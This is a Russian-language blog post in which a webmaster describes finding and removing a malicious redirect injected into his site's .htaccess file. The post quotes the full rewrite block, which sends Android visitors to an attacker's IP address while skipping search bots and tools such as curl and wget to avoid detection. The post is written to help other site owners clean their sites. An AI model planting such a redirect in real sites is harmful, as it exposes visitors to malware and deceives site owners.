Наверх

Борьба с вирусом для мобильных устройств

Автор kbaott, 02.03.2015 | Просмотров: 351 | Печать

Друзья мои, я всех приветствую! На днях я снова взялся за Notepad++ и стал работать над адаптивностью данного блога. Дело шло так себе, но в определенный момент при тестировании с мобильных устройств я обнаружил, что браузер ругается на то, что мобильная версия сайта пытается перенаправить пользователя на какую-то левую страничку с очень подозрительным адресом:

http://5.61.34.53/jquery/htaccess.php

При этом Яндекс.Барузер показывает неприятную для всех вебмастеров страничку: «Сайт может угрожать безопасности вашего компьютера«. Понятно, что это вирус и с ним нужно бороться. В процессе тестирования выяснилось точно, что это вирус, который делает переадресацию пользователей с мобильных устройств (как правило под управлением Android) по вот той ссылке, то есть на сайт вредителя.

Многим известный скрипт поиска вредоносного кода Ai-Bolit как ни странно ничего не нашел. Google и Яндекс также ни чем не помогли. По дате последнего изменения файлов движка также внятного ничего не удалось установить, так как файлы CMS я правлю часто и уследить, что сделал я, а что «вирь» — сложно. Поэтому пришлось скачивать практически весь сайт на локальный компьютер. Н у и первым делом я запустил мой любимый Notepad++, задал «Поиск по файлам» с запросом 5.61.34.53. И самое интересное, что в три секунды подлец нашелся — он сидел в корневом .htaccess.

как, спрашивается, он там оказался и почему я его там не увидел, ведь я лично открывал этот файл в первую очередь?! А так — вирус прописал редирект не просто в конце этого файла, а добавил еще около ста переходов на новую строку и, конечно, быстро просматривая файлы можно просто не заметить эту хитрость. Рассчитано на невнимательность, на чем я и попался.

Итак, вот этот код, который нужно удалить из файла .htaccess который лежит в корне сайта (код начинается примерно со 130 строки):

RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://5.61.34.53/jquery/htaccess.php [L,R=302] # on

После удаления все нормально. Сразу же стоит поменять пароли на FTP и/или вообще в админке хостинга отключить доступ по FTP и включать его когда потребуется. Также желательно не пользоваться для работы по FTP взломанным Total Commander — из него легко уводят ся пароли. Хотя если честно, то пароли увести можно откуда угодно, но лучше уменьшить этот список, хотя бы, не пользуясь для работы с сайтами ломаным и хаканым софтом.

Конечно, этот код может быть и несколько видоизмененным и не обязательно он будет вести на сайт с вирусом. Я встречал жалобы, что примерно такой же код встраивали конкуренты для перенаправления на свой сайт. А еще так SEO-шники балуются, накачивая мобильный (и не только) трафик на свои говно-блоги, за что и перестрелял бы их всех без суда и следствия.

Также замечу, что CMS, на которой работает сайт в целом не важна: ломали как и WordPress, так и Joomla, так и «Битрикс», и Drupal.

Ну вот и все. Здоровья вам и вашим сайтам.

Вместо эпилога:

На картриджах NES(Dendy) тоже стояли защиты, которые делали сложность игры невменяемой, если игра обнаруживала, что её взломали и запустили на не оригинальной NES. А так как на пост советском пространстве оригинальных NES вообще не было, то такие игры, как «Teenage Mutant Ninja Turtles 2» мы проходили, даже не зная, что разработчики считали их не проходимыми.

Метки: , , ,
Писано 02.03.2015

Понравилась статья? Тогда получайте обновления на e-mail: